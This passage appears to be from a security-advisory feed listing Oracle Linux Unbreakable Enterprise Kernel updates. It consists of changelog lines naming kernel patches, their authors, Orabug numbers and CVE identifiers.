{CVE-2024-41095}- hexagon: fix fadvise64_64 calling conventions (Arnd Bergmann) - csky, hexagon: fix broken sys_sync_file_range (Arnd Bergmann) - net: can: j1939: enhanced error handling for tightly received RTS messages in xtp_rx_rts_session_new (Oleksij Rempel) - net: can: j1939: recover socket queue on CAN bus error during BAM transmission (Oleksij Rempel) - net: can: j1939: Initialize unused data in j1939_send_one() (Shigeru Yoshida) [Orabug: 36897516] {CVE-2024-42076}- tty: mcf: MCF54418 has 10 UARTS (Jean-Michel Hautbois) - usb: atm: cxacru: fix endpoint checking in cxacru_bind() (Nikita Zhandarovich) [Orabug: 36897451] {CVE-2024-41097}- usb: musb: da8xx: fix a resource leak in probe() (Dan Carpenter) - usb: gadget: printer: SS+ support (Oliver Neukum) - net: usb: ax88179_178a: improve link status logs (Jose Ignacio Tornos Martinez) - iio: chemical: bme680: Fix sensor data read operation (Vasileios Amoiridis) - iio: chemical: bme680: Fix overflows in compensate() functions (Vasileios Amoiridis) [Orabug: 36897566] {CVE-2024-42086}- iio: chemical: bme680: Fix calibration data variable (Vasileios Amoiridis) - iio: chemical: bme680: Fix pressure value output (Vasileios Amoiridis) - iio: adc: ad7266: Fix variable checking bug (Fernando Yang) - mmc: sdhci: Do not lock spinlock around mmc_gpio_get_ro() (Adrian Hunter) - mmc: sdhci: Do not invert write-protect twice (Adrian Hunter) - mmc: sdhci-pci: Convert PCIBIOS_* return codes to errnos (Ilpo Jarvinen) - x86: stop playing stack games in profile_pc() (Linus Torvalds) [Orabug: 36897616] {CVE-2024-42096}- gpio: davinci: Validate the obtained number of IRQs (Aleksandr Mishin) [Orabug: 36897599] {CVE-2024-42092}- nvme: fixup comment for nvme RDMA Provider Type (Hannes Reinecke) - soc: ti: wkup_m3_ipc: Send NULL dummy message instead of pointer message (Andrew Davis) - media: dvbdev: Initialize sbuf (Ricardo Ribalda) - ALSA: emux: improve patch ioctl data validation (Oswald Buddenhagen) [Orabug: 36897624] {CVE-2024-42097}- net/dpaa2: Avoid explicit cpumask var allocation on stack (Dawei Li) [Orabug: 36897602] {CVE-2024-42093}- net/iucv: Avoid explicit cpumask var allocation on stack (Dawei Li) [Orabug: 36897608] {CVE-2024-42094}- mtd: partitions: redboot: Added conversion of operands to a larger type (Denis Arefev) - drm/panel: ilitek-ili9881c: Fix warning with GPIO controllers that sleep (Laurent Pinchart) [Orabug: 36897570] {CVE-2024-42087}- netfilter: nf_tables: fully validate NFT_DATA_VALUE on store to data registers (Pablo Neira Ayuso) [Orabug: 36897500] {CVE-2024-42070}- parisc: use correct compat recv/recvfrom syscalls (Arnd Bergmann) - sparc: fix old compat_sys_select() (Arnd Bergmann) - net: phy: micrel: add Microchip KSZ 9477 to the device table (Enguerrand de Ribaucourt) - net: phy: mchp: Add support for LAN8814 QUAD PHY (Divya Koppera) - net: dsa: microchip: fix initial port flush problem (Tristram Ha) - ASoC: fsl-asoc-card: set priv->pdev before using it (Elinor Montmasson) [Orabug: 36897578] {CVE-2024-42089}- netfilter: nf_tables: validate family when identifying table via handle (Pablo Neira Ayuso) - drm/amdgpu: fix UBSAN warning in kv_dpm.c (Alex Deucher) [Orabug: 36835992] {CVE-2024-40987}- pinctrl: rockchip: fix pinmux reset in rockchip_pmx_set (Huang-Huang Bao) - pinctrl: rockchip: fix pinmux bits for RK3328 GPIO3-B pins (Huang-Huang Bao) - pinctrl: rockchip: fix pinmux bits for RK3328 GPIO2-B pins (Huang-Huang Bao) - pinctrl: fix deadlock in create_pinctrl() when handling -EPROBE_DEFER (Hagar Hemdan) [Orabug: 36897586] {CVE-2024-42090}- iio: dac: ad5592r: fix temperature channel scaling value (Marc Ferland) - iio: dac: ad5592r: un-indent code-block for scale read (Alexandru Ardelean) - iio: dac: ad5592r-base: Replace indio_dev->mlock with own device lock (Sergiu Cuciurean) - x86/amd_nb: Check for invalid SMN reads (Yazen Ghannam) - PCI: Add PCI_ERROR_RESPONSE and related definitions (Naveen Naidu) - perf/core: Fix missing wakeup when waiting for context reference (Haifeng Xu) - tracing: Add MODULE_DESCRIPTION() to preemptirq_delay_test (Jeff Johnson) - arm64: dts: qcom: qcs404: fix bluetooth device address (Johan Hovold) - ARM: dts: samsung: smdk4412: fix keypad no-autorepeat (Krzysztof Kozlowski) - ARM: dts: samsung: exynos4412-origen: fix keypad no-autorepeat (Krzysztof Kozlowski) - ARM: dts: samsung: smdkv310: fix keypad no-autorepeat (Krzysztof Kozlowski) - i2c: ocores: set IACK bit after core is enabled (Grygorii Tertychnyi) - gcov: add support for GCC 14 (Peter Oberparleiter) - drm/radeon: fix UBSAN warning in kv_dpm.c (Alex Deucher) [Orabug: 36835997] {CVE-2024-40988}- ACPICA: Revert 'ACPICA: avoid Info: mapping multiple BARs. Your kernel is fine.' (Raju Rangoju) - dmaengine: ioatdma: Fix missing kmem_cache_destroy() (Nikita Shubin) - regulator: core: Fix modpost error 'regulator_get_regmap' undefined (Biju Das) - net: usb: rtl8150 fix unintiatilzed variables in rtl8150_get_link_ksettings (Oliver Neukum) - netfilter: ipset: Fix suspicious rcu_dereference_protected() (Jozsef Kadlecsik) [Orabug: 36838634] {CVE-2024-40993}- virtio_net: checksum offloading handling fix (Heng Qi) - net/sched: act_api: fix possible infinite loop in tcf_idr_check_alloc() (David Ruth) [Orabug: 36836019] {CVE-2024-40995}- net/sched: act_api: rely on rcu in tcf_idr_check_alloc (Pedro Tammela) - netns: Make get_net_ns() handle zero refcount net (Yue Haibing) [Orabug: 36835849] {CVE-2024-40958}- xfrm6: check ip6_dst_idev() return value in xfrm6_get_saddr() (Eric Dumazet) [Orabug: 36835852] {CVE-2024-40959}- ipv6: prevent possible NULL dereference in rt6_probe() (Eric Dumazet) [Orabug: 36835857] {CVE-2024-40960}- ipv6: prevent possible NULL deref in fib6_nh_init() (Eric Dumazet) [Orabug: 36835862] {CVE-2024-40961}- netrom: Fix a memory leak in nr_heartbeat_expiry() (Gavrilov Ilia) [Orabug: 36836086] {CVE-2024-41006}- cipso: fix total option length computation (Ondrej Mosnacek) - mips: bmips: BCM6358: make sure CBR is correctly set (Christian Marangi) [Orabug: 36835870] {CVE-2024-40963}- MIPS: Routerboard 532: Fix vendor retry check code (Ilpo Jarvinen) - PCI/PM: Avoid D3cold for HP Pavilion 17 PC/1972 PCIe Ports (Mario Limonciello) - udf: udftime: prevent overflow in udf_disk_stamp_to_time() (Roman Smirnov) - usb: misc: uss720: check for incompatible versions of the Belkin F5U002 (Alex Henrie) - powerpc/io: Avoid clang null pointer arithmetic warnings (Michael Ellerman) - powerpc/pseries: Enforce hcall result buffer validity and size (Nathan Lynch) [Orabug: 36835926] {CVE-2024-40974}- Bluetooth: ath3k: Fix multiple issues reported by checkpatch.pl (Uri Arev) - scsi: qedi: Fix crash while reading debugfs attribute (Manish Rangankar) [Orabug: 36835947] {CVE-2024-40978}- drop_monitor: replace spin_lock by raw_spin_lock (Wander Lairson Costa) [Orabug: 36835960] {CVE-2024-40980}- batman-adv: bypass empty buckets in batadv_purge_orig_ref() (Eric Dumazet) [Orabug: 36835966] {CVE-2024-40981}- selftests/bpf: Prevent client connect before server bind in test_tc_tunnel.sh (Alessandro Carminati (Red Hat)) - rcutorture: Fix rcu_torture_one_read() pipe_count overflow comment (Paul E. McKenney) - i2c: at91: Fix the functionality flags of the slave-only interface (Jean Delvare) - usb-storage: alauda: Check whether the media is initialized (Shichao Lai) [Orabug: 36753734] {CVE-2024-38619}- greybus: Fix use-after-free bug in gb_interface_release due to race condition. (Sicong Huang) [Orabug: 36835564] {CVE-2024-39495}- netfilter: nftables: exthdr: fix 4-byte stack OOB write (Florian Westphal) [Orabug: 35814445] {CVE-2023-4881} {CVE-2023-52628}- hugetlb_encode.h: fix undefined behaviour (34 << 26) (Matthias Goergens) - tick/nohz_full: Don't abuse smp_call_function_single() in tick_setup_device() (Oleg Nesterov) - nilfs2: fix potential kernel bug due to lack of writeback flag waiting (Ryusuke Konishi) [Orabug: 36774571] {CVE-2024-37078}- intel_th: pci: Add Lunar Lake support (Alexander Shishkin) - intel_th: pci: Add Meteor Lake-S support (Alexander Shishkin) - intel_th: pci: Add Sapphire Rapids SOC support (Alexander Shishkin) - intel_th: pci: Add Granite Rapids SOC support (Alexander Shishkin) - intel_th: pci: Add Granite Rapids support (Alexander Shishkin) - dmaengine: axi-dmac: fix possible race in remove() (Nuno Sa) - PCI: rockchip-ep: Remove wrong mask on subsys_vendor_id (Rick Wertenbroek) - ocfs2: fix races between hole punching and AIO+DIO (Su Yue) [Orabug: 36835817] {CVE-2024-40943}- ocfs2: use coarse time for new created files (Su Yue) - fs/proc: fix softlockup in __read_vmcore (Rik van Riel) - vmci: prevent speculation leaks by sanitizing event in event_deliver() (Hagar Gamal Halim Hemdan) [Orabug: 36835582] {CVE-2024-39499}- tracing/selftests: Fix kprobe event name test for .isra. functions (Steven Rostedt (Google)) - drm/exynos/vidi: fix memory leak in .get_modes() (Jani Nikula) [Orabug: 36835786] {CVE-2024-40932}- drivers: core: synchronize really_probe() and dev_uevent() (Dirk Behme) [Orabug: 36835589] {CVE-2024-39501}- ionic: fix use after netif_napi_del() (Taehee Yoo) [Orabug: 36835595] {CVE-2024-39502}- net/ipv6: Fix the RT cache flush via sysctl using a previous delay (Petr Pavlu) - net/mlx5e: Fix features validation check for tunneled UDP (non-VXLAN) packets (Gal Pressman) - tcp: fix race in tcp_v6_syn_recv_sock() (Eric Dumazet) - drm/bridge/panel: Fix runtime warning on panel bridge release (Adam Miotk) - drm/komeda: check for error-valued pointer (Amjad Ouled-Ameur) [Orabug: 36835674] {CVE-2024-39505}- liquidio: Adjust a NULL pointer handling path in lio_vf_rep_copy_packet (Aleksandr Mishin) [Orabug: 36835677] {CVE-2024-39506}- HID: logitech-dj: Fix memory leak in logi_dj_recv_switch_to_dj_mode() (Jose Exposito) [Orabug: 36835793] {CVE-2024-40934}- iommu: Return right value in iommu_sva_bind_device() (Lu Baolu) [Orabug: 36835824] {CVE-2024-40945}- iommu/amd: Fix sysfs leak in iommu init (Kun(llfl)) - HID: core: remove unnecessary WARN_ON() in implement() (Nikita Zhandarovich) [Orabug: 36835689] {CVE-2024-39509}- gpio: tqmx86: fix typo in Kconfig label (Gregor Herburger) - SUNRPC: return proper error from gss_wrap_req_priv (Chen Hanxiao) - Input: try trimming too long modalias strings (Dmitry Torokhov) - scsi: mpt3sas: Avoid test/set_bit() operating in non-allocated memory (Breno Leitao) [Orabug: 36835696] {CVE-2024-40901}- xhci: Apply broken streams quirk to Etron EJ188 xHCI host (Kuangyi Chiang) - xhci: Apply reset resume quirk to Etron EJ188 xHCI host (Kuangyi Chiang) - xhci: Set correct transferred length for cancelled bulk transfers (Mathias Nyman) - jfs: xattr: fix buffer overflow for invalid xattr (Greg Kroah-Hartman) [Orabug: 36835701] {CVE-2024-40902}- mei: me: release irq in mei_me_pci_resume error path (Tomas Winkler) - USB: class: cdc-wdm: Fix CPU lockup caused by excessive log messages (Alan Stern) [Orabug: 36835709] {CVE-2024-40904}- nilfs2: fix nilfs_empty_dir() misjudgment and long loop on I/O errors (Ryusuke Konishi) [Orabug: 36774647] {CVE-2024-39469}- nilfs2: return the mapped address from nilfs_get_page() (Matthew Wilcox (Oracle)) - nilfs2: Remove check for PageError (Matthew Wilcox (Oracle)) - selftests/mm: compaction_test: fix bogus test success on Aarch64 (Dev Jain) - selftests/mm: conform test to TAP format output (Muhammad Usama Anjum) - selftests/mm: compaction_test: fix incorrect write of zero to nr_hugepages (Dev Jain) - serial: sc16is7xx: fix bug in sc16is7xx_set_baud() when using prescaler (Hugo Villeneuve) - serial: sc16is7xx: replace hardcoded divisor value with BIT() macro (Hugo Villeneuve) - drm/amd/display: Handle Y carry-over in VCP X.Y calculation (George Shen) - ASoC: ti: davinci-mcasp: Fix race condition during probe (Joao Paulo Goncalves) - ASoC: ti: davinci-mcasp: Handle missing required DT properties (Peter Ujfalusi) - ASoC: ti: davinci-mcasp: Simplify the configuration parameter handling (Peter Ujfalusi) - ASoC: ti: davinci-mcasp: Remove legacy dma_request parsing (Peter Ujfalusi) - ASoC: ti: davinci-mcasp: Use platform_get_irq_byname_optional (Peter Ujfalusi) - ASoC: ti: davinci-mcasp: remove always zero of davinci_mcasp_get_dt_params (Zhang Qilong) - ASoC: ti: davinci-mcasp: remove redundant assignment to variable ret (Colin Ian King) - usb: gadget: f_fs: Fix race between aio_cancel() and AIO request complete (Wesley Cheng) [Orabug: 36683255] {CVE-2024-36894}- ipv6: fix possible race in __fib6_drop_pcpu_from() (Eric Dumazet) [Orabug: 36835716] {CVE-2024-40905}- af_unix: Annotate data-race of sk->sk_shutdown in sk_diag_fill(). (Kuniyuki Iwashima) - af_unix: Use skb_queue_len_lockless() in sk_diag_show_rqlen(). (Kuniyuki Iwashima) - af_unix: Use unix_recvq_full_lockless() in unix_stream_connect(). (Kuniyuki Iwashima) - af_unix: Annotate data-race of net->unx.sysctl_max_dgram_qlen. (Kuniyuki Iwashima) - af_unix: Annotate data-races around sk->sk_state in UNIX_DIAG. (Kuniyuki Iwashima) - af_unix: Annotate data-races around sk->sk_state in sendmsg() and recvmsg(). (Kuniyuki Iwashima) - af_unix: Annotate data-races around sk->sk_state in unix_write_space() and poll(). (Kuniyuki Iwashima) - af_unix: Annotate data-race of sk->sk_state in unix_inq_len(). (Kuniyuki Iwashima) - ptp: Fix error message on failed pin verification (Karol Kolacinski) - net/sched: taprio: always validate TCA_TAPRIO_ATTR_PRIOMAP (Eric Dumazet) [Orabug: 36748169] {CVE-2024-36974}- tcp: count CLOSE-WAIT sockets for TCP_MIB_CURRESTAB (Jason Xing) - net: sched: sch_multiq: fix possible OOB write in multiq_tune() (Hangyu Hua) [Orabug: 36748177] {CVE-2024-36978}- ipv6: sr: block BH in seg6_output_core() and seg6_input_core() (Eric Dumazet) - wifi: iwlwifi: mvm: don't read past the mfuart notifcation (Emmanuel Grumbach) [Orabug: 36835808] {CVE-2024-40941}- wifi: iwlwifi: dbg_ini: move iwl_dbg_tlv_free outside of debugfs ifdef (Shahar S Matityahu) - wifi: iwlwifi: mvm: revert gen2 TX A-MPDU size to 64 (Johannes Berg) - wifi: cfg80211: pmsr: use correct nla_get_uX functions (Lin Ma) - wifi: mac80211: Fix deadlock in ieee80211_sta_ps_deliver_wakeup() (Remi Pommarel) [Orabug: 36835735] {CVE-2024-40912}- wifi: mac80211: mesh: Fix leak of mesh_preq_queue objects (Nicolas Escande) [Orabug: 36835812] {CVE-2024-40942}	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12610
11.09.2024 03:00:00	oraclelinux	[ELSA-2024-12611] Unbreakable Enterprise kernel security update (important)	[4.14.35-2047.540.4.1]- Revert 'selftests/kcmp: Make the test output consistent and clear' (Samasth Norway Ananda) [Orabug: 37029311][4.14.35-2047.540.4]- kdb: Use the passed prompt in kdb_position_cursor() (Douglas Anderson) - ipvs: Avoid unnecessary calls to skb_is_gso_sctp (Ismael Luceno) - printk: add kthread for long-running print (Stephen Brennan) [Orabug: 36208661][4.14.35-2047.540.3]- MIPS: Octeon: Add PCIe link status check (Dave Kleikamp) [Orabug: 36952386] {CVE-2024-40968}[4.14.35-2047.540.2]- fsnotify: clear PARENT_WATCHED flags lazily (Amir Goldstein) [Orabug: 36922242] - cifs: fix panic in smb2_reconnect (Ronnie Sahlberg) [Orabug: 36314494] - cifs: convert cifs_put_smb_ses from static to global (Dai Ngo) [Orabug: 36314494] - net: relax socket state check at accept time. (Paolo Abeni) [Orabug: 36768890] {CVE-2024-36484}[4.14.35-2047.540.1]- x86/cpu: Avoid cpuinfo-induced IPI pileups (Paul E. McKenney) [Orabug: 35773812] - LTS version v4.14.349 (Yifei Liu) - x86/kvm: Disable all PV features on crash (Vitaly Kuznetsov) - x86/kvm: Disable kvmclock on all CPUs on shutdown (Vitaly Kuznetsov) - x86/kvm: Teardown PV features on boot CPU as well (Vitaly Kuznetsov) - nfs: fix undefined behavior in nfs_block_bits() (Sergey Shtylyov) - ext4: fix mb_cache_entry's e_refcnt leak in ext4_xattr_block_cache_find() (Baokun Li) [Orabug: 36774600] {CVE-2024-39276}- sparc: move struct termio to asm/termios.h (Mike Gilbert) - kdb: Use format-specifiers rather than memset() for padding in kdb_read() (Daniel Thompson) - kdb: Merge identical case statements in kdb_read() (Daniel Thompson) - kdb: Fix console handling when editing and tab-completing commands (Daniel Thompson) - kdb: Use format-strings rather than '- kdb: Fix buffer overflow during tab-complete (Daniel Thompson) [Orabug: 36809289] {CVE-2024-39480}- sparc64: Fix number of online CPUs (Sam Ravnborg) - intel_th: pci: Add Meteor Lake-S CPU support (Alexander Shishkin) - net/9p: fix uninit-value in p9_client_rpc() (Nikita Zhandarovich) [Orabug: 36774613] {CVE-2024-39301}- KVM: arm64: Allow AArch32 PSTATE.M to be restored as System mode (Marc Zyngier) - netfilter: nft_dynset: relax superfluous check on set updates (Pablo Neira Ayuso) - netfilter: nft_dynset: report EOPNOTSUPP on missing set feature (Pablo Neira Ayuso) - netfilter: nf_tables: don't skip expired elements during walk (Pablo Neira Ayuso) - netfilter: nf_tables: drop map element references from preparation phase (Pablo Neira Ayuso) - netfilter: nf_tables: pass ctx to nf_tables_expr_destroy() (Pablo Neira Ayuso) - netfilter: nftables: rename set element data activation/deactivation functions (Pablo Neira Ayuso) - netfilter: nf_tables: pass context to nft_set_destroy() (Pablo Neira Ayuso) - netfilter: nf_tables: fix set double-free in abort path (Pablo Neira Ayuso) - netfilter: nf_tables: add nft_set_is_anonymous() helper (Pablo Neira Ayuso) - fbdev: savage: Handle err return when savagefb_check_var failed (Cai Xinchen) [Orabug: 36809265] {CVE-2024-39475}- media: v4l2-core: hold videodev_lock until dev reg, finishes (Hans Verkuil) - media: mxl5xx: Move xpt structures off stack (Nathan Chancellor) - arm64: dts: hi3798cv200: fix the size of GICR (Yang Xiwen) - arm64: tegra: Correct Tegra132 I2C alias (Krzysztof Kozlowski) - ata: pata_legacy: make legacy_exit() work again (Sergey Shtylyov) - neighbour: fix unaligned access to pneigh_entry (Qingfang DENG) - nilfs2: fix use-after-free of timer for log writer thread (Ryusuke Konishi) [Orabug: 36753565] {CVE-2024-38583}- fs/nilfs2: convert timers to use timer_setup() (Kees Cook) - mmc: core: Do not force a retune before RPMB switch (Jorge Ramirez-Ortiz) - binder: fix max_thread type inconsistency (Carlos Llamas) - ALSA: timer: Set lower bound of start tick time (Takashi Iwai) [Orabug: 36753730] {CVE-2024-38618}- ALSA: timer: Simplify timer hw resolution calls (Takashi Iwai) - ipvlan: Dont Use skb->sk in ipvlan_process_v{4,6}_outbound (Yue Haibing) [Orabug: 36763552] {CVE-2024-33621}- ipvlan: add ipvlan_route_v6_outbound() helper (Eric Dumazet) [Orabug: 36940543] {CVE-2023-52796}- ipvlan: properly track tx_errors (Eric Dumazet) - net: add DEV_STATS_READ() helper (Eric Dumazet) - kconfig: fix comparison to constant symbols, 'm', 'n' (Masahiro Yamada) - net:fec: Add fec_enet_deinit() (Xiaolei Wang) - net: usb: smsc95xx: fix changing LED_SEL bit value updated from EEPROM (Parthiban Veerasooran) - smsc95xx: use usbnet->driver_priv (Andre Edich) - smsc95xx: remove redundant function arguments (Andre Edich) - enic: Validate length of nl attributes in enic_set_vf_port (Roded Zats) [Orabug: 36763837] {CVE-2024-38659}- dma-buf/sw-sync: don't enable IRQ from sync_print_obj() (Tetsuo Handa) [Orabug: 36763846] {CVE-2024-38780}- net/mlx5e: Use rx_missed_errors instead of rx_dropped for reporting buffer exhaustion (Carolina Jubran) - nvmet: fix ns enable/disable possible hang (Sagi Grimberg) - spi: Don't mark message DMA mapped when no transfer in it is (Andy Shevchenko) - netfilter: nfnetlink_queue: acquire rcu_read_lock() in instance_destroy_rcu() (Eric Dumazet) [Orabug: 36763571] {CVE-2024-36286}- net: fec: avoid lock evasion when reading pps_enable (Wei Fang) - net: fec: remove redundant variable 'inc' (Colin Ian King) - virtio: delete vq in vp_find_vqs_msix() when request_irq() fails (Jiri Pirko) [Orabug: 36763588] {CVE-2024-37353}- arm64: asm-bug: Add .align 2 to the end of __BUG_ENTRY (Jiangfeng Xiao) [Orabug: 36825259] {CVE-2024-39488}- openvswitch: Set the skbuff pkt_type for proper pmtud support. (Aaron Conole) - tcp: Fix shift-out-of-bounds in dctcp_update_alpha(). (Kuniyuki Iwashima) [Orabug: 36763592] {CVE-2024-37356}- params: lift param_set_uint_minmax to common code (Sagi Grimberg) - ipv6: sr: fix memleak in seg6_hmac_init_algo (Hangbin Liu) [Orabug: 36825263] {CVE-2024-39489}- x86/kconfig: Select ARCH_WANT_FRAME_POINTERS again when UNWINDER_FRAME_POINTER=y (Masahiro Yamada) - null_blk: Fix the WARNING: modpost: missing MODULE_DESCRIPTION() (Zhu Yanjun) - media: cec: cec-api: add locking in cec_release() (Hans Verkuil) - um: Fix the -Wmissing-prototypes warning for __switch_mm (Tiwei Bie) - powerpc/pseries: Add failure related checks for h_get_mpp and h_get_ppp (Shrikanth Hegde) - media: stk1160: fix bounds checking in stk1160_copy_video() (Dan Carpenter) [Orabug: 36763603] {CVE-2024-38621}- um: Add winch to winch_handlers before registering winch IRQ (Roberto Sassu) [Orabug: 36768584] {CVE-2024-39292}- um: Fix return value in ubd_init() (Duoming Zhou) - Input: pm8xxx-vibrator - correct VIB_MAX_LEVELS calculation (Fenglin Wu) - Input: ims-pcu - fix printf string overflow (Arnd Bergmann) - libsubcmd: Fix parse-options memory leak (Ian Rogers) - f2fs: add error prints for debugging mount failure (Sahitya Tummala) - extcon: max8997: select IRQ_DOMAIN instead of depending on it (Randy Dunlap) - ppdev: Add an error check in register_device (Huai-Yuan Liu) [Orabug: 36678065] {CVE-2024-36015}- stm class: Fix a double free in stm_register_device() (Dan Carpenter) [Orabug: 36763764] {CVE-2024-38627}- usb: gadget: u_audio: Clear uac pointer when freed. (Chris Wulff) - greybus: arche-ctrl: move device table to its right location (Arnd Bergmann) - serial: max3100: Fix bitwise types (Andy Shevchenko) - serial: max3100: Update uart_driver_registered on driver removal (Andy Shevchenko) [Orabug: 36763815] {CVE-2024-38633}- serial: max3100: Lock port->lock when calling uart_handle_cts_change() (Andy Shevchenko) [Orabug: 36763820] {CVE-2024-38634}- firmware: dmi-id: add a release callback function (Arnd Bergmann) - dmaengine: idma64: Add check for dma_set_max_seg_size (Chen Ni) - greybus: lights: check return of get_channel_from_mode (Rui Miguel Silva) [Orabug: 36763833] {CVE-2024-38637}- sched/fair: Allow disabling sched_balance_newidle with sched_relax_domain_level (Vitalii Bursov) - sched/topology: Don't set SD_BALANCE_WAKE on cpuset domain relax (Valentin Schneider) - af_packet: do not call packet_read_pending() from tpacket_destruct_skb() (Eric Dumazet) - netrom: fix possible dead-lock in nr_rt_ioctl() (Eric Dumazet) [Orabug: 36753582] {CVE-2024-38589}- RDMA/IPoIB: Fix format truncation compilation errors (Leon Romanovsky) - RDMA/ipoib: Fix use of sizeof() (Kamal Heib) - selftests/kcmp: remove unused open mode (Edward Liaw) - selftests/kcmp: Make the test output consistent and clear (Gautam Menghani) - ext4: avoid excessive credit estimate in ext4_tmpfile() (Jan Kara) - x86/insn: Fix PUSH instruction in x86 instruction decoder opcode map (Adrian Hunter) - ASoC: tracing: Export SND_SOC_DAPM_DIR_OUT to its value (Steven Rostedt) - fbdev: sh7760fb: allow modular build (Randy Dunlap) - media: radio-shark2: Avoid led_names truncations (Ricardo Ribalda) - media: ngene: Add dvb_ca_en50221_init return value check (Aleksandr Burakov) - powerpc/fsl-soc: hide unused const variable (Arnd Bergmann) - drm/mediatek: Add 0 size check to mtk_drm_gem_obj (Justin Green) [Orabug: 36753415] {CVE-2024-38549}- fbdev: shmobile: fix snprintf truncation (Arnd Bergmann) - mtd: rawnand: hynix: fixed typo (Maxim Korotkov) - ipv6: sr: fix invalid unregister error path (Hangbin Liu) [Orabug: 36753711] {CVE-2024-38612}- ipv6: sr: fix incorrect unregister order (Hangbin Liu) - ipv6: sr: add missing seg6_local_exit (Hangbin Liu) - net: openvswitch: fix overwriting ct original tuple for ICMPv6 (Ilya Maximets) [Orabug: 36753463] {CVE-2024-38558}- net: usb: smsc95xx: stop lying about skb->truesize (Eric Dumazet) - af_unix: Fix data races in unix_release_sock/unix_stream_sendmsg (Breno Leitao) [Orabug: 36753600] {CVE-2024-38596}- m68k: mac: Fix reboot hang on Mac IIci (Finn Thain) - m68k/mac: Use '030 reset method on SE/30 (Finn Thain) - m68k: Fix spinlock race in kernel thread creation (Michael Schmitz) [Orabug: 36753715] {CVE-2024-38613}- net: usb: sr9700: stop lying about skb->truesize (Eric Dumazet) - wifi: mwl8k: initialize cmd->addr[] properly (Dan Carpenter) - scsi: qedf: Ensure the copied buf is NUL terminated (Bui Quang Minh) [Orabug: 36753468] {CVE-2024-38559}- scsi: bfa: Ensure the copied buf is NUL terminated (Bui Quang Minh) [Orabug: 36753473] {CVE-2024-38560}- Revert 'sh: Handle calling csum_partial with misaligned data' (Guenter Roeck) - sh: kprobes: Merge arch_copy_kprobe() into arch_prepare_kprobe() (Geert Uytterhoeven) - wifi: ar5523: enable proper endpoint verification (Nikita Zhandarovich) [Orabug: 36753486] {CVE-2024-38565}- wifi: carl9170: add a proper sanity check for endpoints (Nikita Zhandarovich) [Orabug: 36753509] {CVE-2024-38567}- macintosh/via-macii: Fix 'BUG: sleeping function called from invalid context' (Finn Thain) - macintosh/via-macii, macintosh/adb-iop: Clean up whitespace (Finn Thain) - m68k/mac: Add mutual exclusion for IOP interrupt polling (Finn Thain) - macintosh/via-macii: Remove BUG_ON assertions (Finn Thain) - wifi: ath10k: Fix an error code problem in ath10k_dbg_sta_write_peer_debug_trigger() (Su Hui) - scsi: hpsa: Fix allocation size for Scsi_Host private data (Yuri Karpov) - scsi: libsas: Fix the failure of adding phy with zero-address to port (Xingui Yang) - ACPI: disable -Wstringop-truncation (Arnd Bergmann) - irqchip/alpine-msi: Fix off-by-one in allocation error path (Zenghui Yu) - scsi: ufs: core: Perform read back after disabling UIC_COMMAND_COMPL (Andrew Halaney) - scsi: ufs: core: Perform read back after disabling interrupts (Andrew Halaney) - scsi: ufs: qcom: Perform read back after writing reset bit (Andrew Halaney) - wifi: ath10k: poll service ready message before failing (Baochen Qiang) - nfsd: drop st_mutex before calling move_to_close_lru() (NeilBrown) - null_blk: Fix missing mutex_destroy() at module removal (Zhu Yanjun) - jffs2: prevent xattr node from overflowing the eraseblock (Ilya Denisyev) [Orabug: 36753652] {CVE-2024-38599}- crypto: ccp - drop platform ifdef checks (Arnd Bergmann) - parisc: add missing export of __cmpxchg_u8() (Al Viro) - nilfs2: fix out-of-range warning (Arnd Bergmann) - ecryptfs: Fix buffer size for tag 66 packet (Brian Kubisiak) [Orabug: 36753537] {CVE-2024-38578}- firmware: raspberrypi: Use correct device for DMA mappings (Laurent Pinchart) - crypto: bcm - Fix pointer arithmetic (Aleksandr Mishin) [Orabug: 36753542] {CVE-2024-38579}- ASoC: da7219-aad: fix usage of device_get_named_child_node() (Pierre-Louis Bossart) - ASoC: dt-bindings: rt5645: add cbj sleeve gpio property (Derek Fang) - ASoC: rt5645: Fix the electric noise due to the CBJ contacts floating (Derek Fang) - net: usb: qmi_wwan: add Telit FN920C04 compositions (Daniele Palmas) - wifi: cfg80211: fix the order of arguments for trace events of the tx_rx_evt class (Igor Artemiev) - tty: n_gsm: fix possible out-of-bounds in gsm0_receive() (Daniel Starke) [Orabug: 36678069] {CVE-2024-36016}- nilfs2: fix potential hang in nilfs_detach_log_writer() (Ryusuke Konishi) [Orabug: 36753558] {CVE-2024-38582}- nilfs2: fix unexpected freezing of nilfs_segctor_sync() (Ryusuke Konishi) - ring-buffer: Fix a race between readers and resize checks (Petr Pavlu) [Orabug: 36753662] {CVE-2024-38601}	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12611
11.09.2024 03:00:00	oraclelinux	[ELSA-2024-12612] Unbreakable Enterprise kernel-container security update (important)	[5.4.17-2136.335.4.el7]- mm: memcg/slab: enable kmalloc-cg-<n> caches for x86_64. (Imran Khan) [Orabug: 36951041]- printk: add kthread for long-running print (Stephen Brennan) [Orabug: 36456582]- kdb: Use the passed prompt in kdb_position_cursor() (Douglas Anderson) - driver core: Fix uevent_show() vs driver detach race (Dan Williams) - pinctrl: ti: ti-iodelay: fix possible memory leak when pinctrl_enable() fails (Yang Yingliang) - pinctrl: ti: ti-iodelay: Drop if block with always false condition (Uwe Kleine-Konig) - pinctrl: single: fix possible memory leak when pinctrl_enable() fails (Yang Yingliang) - pinctrl: core: fix possible memory leak when pinctrl_enable() fails (Yang Yingliang) - ipvs: Avoid unnecessary calls to skb_is_gso_sctp (Ismael Luceno)[5.4.17-2136.335.3.el7]- MIPS: Octeon: Add PCIe link status check (Dave Kleikamp) [Orabug: 36947196][5.4.17-2136.335.2.el7]- drm/amdgpu: Fix signedness bug in sdma_v4_0_process_trap_irq() (Dan Carpenter) - net: relax socket state check at accept time. (Paolo Abeni) - fsnotify: clear PARENT_WATCHED flags lazily (Amir Goldstein) [Orabug: 36922241]- NFSD: Increase NFSD_MAX_OPS_PER_COMPOUND (Chuck Lever) [Orabug: 36908594]- x86/cpu: Avoid cpuinfo-induced IPI pileups (Paul E. McKenney) [Orabug: 35773811][5.4.17-2136.335.1.el7]- LTS tag: v5.4.280 (Alok Tiwari) - i2c: rcar: bring hardware to known state when probing (Wolfram Sang) - nilfs2: fix kernel bug on rename operation of broken directory (Ryusuke Konishi) - tcp: avoid too many retransmit packets (Eric Dumazet) - tcp: use signed arithmetic in tcp_rtx_probe0_timed_out() (Eric Dumazet) - net: tcp: fix unexcepted socket die when snd_wnd is 0 (Menglong Dong) - tcp: refactor tcp_retransmit_timer() (Eric 